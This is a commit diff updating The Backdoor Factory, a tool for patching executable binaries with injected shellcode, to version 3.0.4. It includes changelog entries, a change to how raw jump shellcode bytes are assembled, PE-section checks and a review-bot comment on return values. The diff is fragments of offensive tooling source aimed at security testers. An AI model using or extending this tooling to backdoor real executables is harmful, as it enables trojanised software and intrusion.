Commit b4a2273e authored by Sophie Brun

Imported Upstream version 3.0.4

parent 51d82532
##The Backdoor Factory (BDF)
#### YOU MUST BE *THIS* TALL TO RIDE THIS RIDE
For security professionals and researchers only.
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
DerbyCon 2013:
Video: http://www.youtube.com/watch?v=jXLb2RNX5xs
......@@ -221,6 +223,15 @@ Sample Usage:
###Changelog
####7/06/2015
* Clean exit if text section name is mangled or out of order.
####5/01/2015
* Bug fix to the reverse_tcp_stager_threaded payload when using single caves payload
####4/28/2015
* Adding check for Bound Imports (PE files with bound imports will not be patched)
......
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
Version: 3.0.2
Version: 3.0.4
"""
author = """\
......
......@@ -280,7 +280,8 @@ class winI32_shellcode():
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
......
......@@ -307,6 +307,17 @@ class pebin():
self.flItms['rsrcVirtualAddress'] = sectionValues[2]
self.flItms['rsrcSizeRawData'] = sectionValues[3]
self.flItms['rsrcPointerToRawData'] = sectionValues[4]
# I could add in checks here to support out of order PE file;
# However if here were multiple sections that were RE, RWE, it would be
# difficult to get it right in a purposefully mangled binary.
# Perhaps if entrypoint is in RE section that is text section? But still.
# That could be spoofed and it returns to another RE section.
if "textSectionName" not in self.flItms:
print "[!] Text section does not have a normal name, not guessing, exiting"
print "[!]\tFirst section, text section potential name:", str(self.flItms['Sections'][0][0])
return False
self.flItms['VirtualAddress'] = self.flItms['SizeOfImage']
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
......@@ -562,7 +573,8 @@ class pebin():
#get file data again
with open(self.flItms['backdoorfile'], 'r+b') as self.binary:
self.gather_file_info_win()
if not self.gather_file_info_win():
return False
return True
......@@ -960,7 +972,8 @@ class pebin():
if self.binary.read(2) != "\x4d\x5a":
print "%s not a PE File" % self.FILE
return False
self.gather_file_info_win()
if not self.gather_file_info_win():
return False
if self.flItms is False:
return False
if MachineTypes[hex(self.flItms['MachineType'])] not in supported_types:
......
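Review bot: Both call sites now treat the result of `gather_file_info_win()` as a success flag (`if not self.gather_file_info_win(): return False` in the hunks at -562 and -960), but the only return visible in that method is the new `return False` in the text-section check. The rest of the method lies outside the hunks, so this cannot be confirmed from here: if its success path falls off the end, it returns `None` and both callers would reject every file, so the method should end with an explicit `return True`. Once that contract holds, the `if self.flItms is False:` test right after the second call looks redundant and should be dropped or given a comment saying what else can set `flItms` to `False`. A one-line docstring on `gather_file_info_win` stating "returns True on success, False when the file should not be processed" would make the contract visible to future callers.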